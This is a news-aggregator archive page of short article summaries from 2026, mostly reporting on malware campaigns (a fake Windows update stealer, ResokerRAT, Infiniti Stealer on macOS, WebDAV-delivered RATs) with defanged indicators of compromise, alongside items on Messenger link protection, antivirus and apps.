URL Archives

Winsage

April 9, 2026

This fake Windows support website delivers password-stealing malware

A phishing campaign has been identified that uses a counterfeit Microsoft support website, microsoft-update[.]support, to trick users into downloading a malicious Windows update disguised as WindowsUpdate 1.0.0.msi. This file, created on April 4, 2026, appears legitimate but contains malware designed to steal sensitive information. The campaign targets French-speaking users, leveraging recent data breaches in France to create convincing scams. The malware, once executed, installs an Electron application that runs a Python interpreter, which then deploys various data theft tools. It employs two persistence mechanisms: modifying the Windows registry and creating a shortcut in the Startup folder. The malware connects to external sites for reconnaissance and data exfiltration, using domains like datawebsync-lvmv.onrender[.]com and store8.gofile[.]io. The malware's components have evaded detection by antivirus tools, with VirusTotal reporting zero detections for the main executable and its launcher. Users are advised to check their registry, remove suspicious files, change passwords, and run a full system scan if they suspect installation of the malicious update. Safe updating practices include using the built-in Windows update feature and being cautious of phishing attempts. Indicators of compromise include specific file hashes, domains associated with the phishing campaign, and file system artifacts related to the malware's installation.

Winsage

April 6, 2026

ResokerRAT Hijacks Telegram API to Command Infected Windows PCs

A newly discovered Windows malware called ResokerRAT uses Telegram’s Bot API for its command-and-control operations, allowing it to monitor and manipulate infected systems without a conventional server. It obscures its communications by integrating with legitimate Telegram traffic, complicating detection. Upon execution, it creates a mutex to ensure only one instance runs and checks for debuggers to avoid analysis. It attempts to relaunch with elevated privileges and logs failures to its operator. ResokerRAT terminates known monitoring tools and installs a global keyboard hook to obstruct defensive key combinations. It operates through text-based commands sent via Telegram, allowing it to check processes, take screenshots, and modify system settings to evade detection. Persistence is achieved by adding itself to startup and altering UAC settings. The malware retrieves additional payloads from specified URLs and uses URL-encoded data for communication. Researchers have confirmed its Telegram traffic, and its behavior aligns with various MITRE ATT&CK techniques. Security teams are advised to monitor for unusual Telegram traffic and scrutinize registry keys related to startup and UAC.

Tech Optimizer

March 30, 2026

Fake Cloudflare CAPTCHA Pages Spread Infiniti Stealer On macOS

Security researchers have identified a new macOS information stealer called Infiniti Stealer, which extracts sensitive information from Mac users using a social engineering tactic known as ClickFix. This method involves a counterfeit Cloudflare human verification page that prompts users to enter a command in their Mac Terminal, allowing the malware to bypass security measures. The infection process consists of three stages: 1. A Bash dropper script downloads and decodes a hidden payload. 2. A Nuitka loader, designed for Apple Silicon Macs, complicates detection by compiling Python code into a native application. 3. The final payload, Infiniti Stealer, harvests personal data such as browser passwords, macOS Keychain entries, cryptocurrency wallets, and captures screenshots. Indicators of Compromise (IOCs) associated with Infiniti Stealer include: - MD5 Dropper: da73e42d1f9746065f061a6e85e28f0c - SHA256 Stage-3: 1e63be724bf651bb17bcf181d11bacfabef6a6360dcdfda945d6389e80f2b958 - C2 Domain: update-check[.]com - C2 URL: https://update-check[.]com/m/7d8df27d95d9 - Panel: Infiniti-stealer[.]com - Packer Magic: 4b 41 59 28 b5 2f fd (KAY + zstd) - Debug Log: /tmp/.bs_debug.log

AppWizard

March 26, 2026

How to Install & Use Stream Cinema App on Android/Google TV

Stream Cinema is a media center application that enables users to stream Video on Demand content and supports various Stremio Addons. It can be installed on devices like the Onn 4K Pro, NVIDIA SHIELD, and Google TV Streamer, but currently does not have an APK for Firestick or Fire TV. The free version offers robust features, while the Premium version costs .99 per year or .99 for a lifetime subscription, providing additional benefits like favorites management and trailer access. The installation process involves downloading the app from the Google Play Store, enabling external sources, and configuring third-party addons. Users can connect to TorrentsDB for streaming links and are advised to use a VPN for privacy. The app features a modern user interface, quick playback, and limited settings. While its legality is uncertain, its presence on Google Play suggests some vetting.

Tech Optimizer

March 12, 2026

Free vs. Paid Antivirus: Is Paying for Protection Really Worth It?

Antivirus companies often offer free protection to build brand awareness, but many restrict their free versions to non-commercial use. Examples include Avast One Basic, AVG AntiVirus Free, Avira Free Security, and Panda Free Antivirus. Free antivirus software typically comes with limited tech support, with direct assistance reserved for paying customers. Key features may be missing in free versions, such as the ability to redirect users from dangerous websites or real-time protection. Microsoft Defender Antivirus is a built-in option that activates when no other antivirus is present but can be cumbersome and has limited protection against malicious URLs outside the Edge browser. Avast One Basic and AVG AntiVirus Free are recognized as top free options, but leading commercial products like Norton AntiVirus Plus and Bitdefender Antivirus Plus consistently outperform them. Both Norton and Bitdefender offer enhanced features beyond basic antivirus capabilities. While free antivirus can be effective, paid solutions provide greater protection and peace of mind.

AppWizard

March 11, 2026

How Advanced Browsing Protection Works in Messenger

Advanced Browsing Protection (ABP) in Messenger enhances user privacy by warning users about potentially harmful links shared in end-to-end encrypted communications. It analyzes links using on-device models and a dynamic watchlist of millions of potentially malicious sites, utilizing cryptographic techniques to maintain user privacy. ABP is based on a cryptographic primitive called private information retrieval (PIR), which minimizes the information a server learns from client queries. The system also employs oblivious pseudorandom functions (OPRFs) and manages URL queries through a privacy-preserving URL-matching scheme. The server groups links by domain, allowing clients to request a single bucket for domain-specific path components, and generates a ruleset to balance bucket sizes. To safeguard client queries, AMD's SEV-SNP technology creates a confidential virtual machine (CVM) that processes hash prefixes securely, generating attestation reports for integrity verification. The use of Oblivious RAM and Oblivious HTTP (OHTTP) enhances privacy by preventing exposure of memory access patterns and stripping identifying information from client requests. The lifecycle of an ABP request includes pre-processing phases where the server updates the URL database and computes rulesets, followed by client requests that involve calculating bucket identifiers, sending encrypted requests through a proxy, and checking for unsafe URLs based on server responses.

AppWizard

March 11, 2026

Messenger can warn you about sketchy links without knowing what you clicked

Meta has introduced Advanced Browsing Protection (ABP) in its Messenger application to enhance user safety by identifying harmful websites during chats. ABP utilizes a constantly updated watchlist of potentially harmful websites, improving upon the existing Safe Browsing feature. Due to end-to-end encryption, Messenger cannot access message content or links, so ABP uses cryptography and secure computing techniques for link verification without exposing them. When a user clicks a link, Messenger checks it against a blocklist using a privacy-preserving query system. Users can enable or disable ABP in the Messenger app under Settings, Privacy & safety, and Safe browsing. If the option is not visible, users may need to update the app.

Winsage

March 3, 2026

This third‑party Windows 11 app fixes one of its most annoying UX problems

The Files app has been updated to version 4.0.28, featuring an improved right-click context menu, bug fixes, support for the Microsoft Store version of Dropbox, icon customization for URL and shortcut files, and an option to disable smooth scrolling. The update resolves several issues, including problems with the 'Open With' menu, tab switching, and tag searches. The development team is focused on performance improvements, particularly for thumbnail loading times. Microsoft has plans to enhance Windows 11 and address user pain points related to File Explorer.

Winsage

March 2, 2026

RAT Malware Via Windows Explorer Puts Crypto at Risk

Cofense Intelligence reported that threat actors are exploiting Windows File Explorer and WebDAV servers to deliver Remote Access Trojans (RATs) to corporate systems, bypassing browser security measures. This method allows attackers to infiltrate machines without using web browsers, taking advantage of File Explorer's ability to connect to remote WebDAV servers. Despite WebDAV being deprecated by Microsoft in November 2023, it is still supported in Windows, creating a vulnerability. The campaigns began in February 2024, with a significant increase in September 2024, and 87% of these campaigns deliver multiple RATs, including XWorm, Async RAT, and DcRAT. Victims typically receive phishing emails disguised as invoices, containing URL or LNK shortcut files that initiate a WebDAV connection. The attacks often utilize Cloudflare Tunnel for hosting malicious WebDAV servers, making the traffic appear legitimate. Notably, 50% of affected campaigns are in German, while 30% are in English. The report emphasizes the risks posed to individuals holding digital assets, as RATs can access sensitive information, including crypto wallet files. Organizations are advised to monitor network traffic for Cloudflare Tunnel instances and educate users about the risks associated with File Explorer's capabilities.

Winsage

March 1, 2026

Hackers Abuse Windows File Explorer and WebDAV for Stealthy Malware Delivery

Cybercriminals are exploiting a legacy feature in Windows File Explorer, specifically the WebDAV protocol, to distribute malware and bypass traditional security measures. Despite Microsoft deprecating native WebDAV support in November 2023, it remains active on many systems. Attackers use WebDAV to deceive victims into executing malicious payloads by sending links that connect File Explorer directly to remote servers, avoiding web browsers and their security warnings. They employ methods such as direct linking, URL shortcut files, and LNK shortcut files to deliver exploits. The primary objective of these campaigns, which surged in late 2024, is to deploy Remote Access Trojans (RATs), with 87% of Active Threat Reports involving multiple RATs like XWorm RAT, Async RAT, and DcRAT. These campaigns predominantly target corporate networks in Europe, with many phishing emails written in German and English. Attackers use short-lived WebDAV servers hosted on Cloudflare Tunnel demo accounts to obscure their infrastructure. Security analysts are advised to monitor unusual network activity from Windows Explorer and educate users to verify addresses in File Explorer.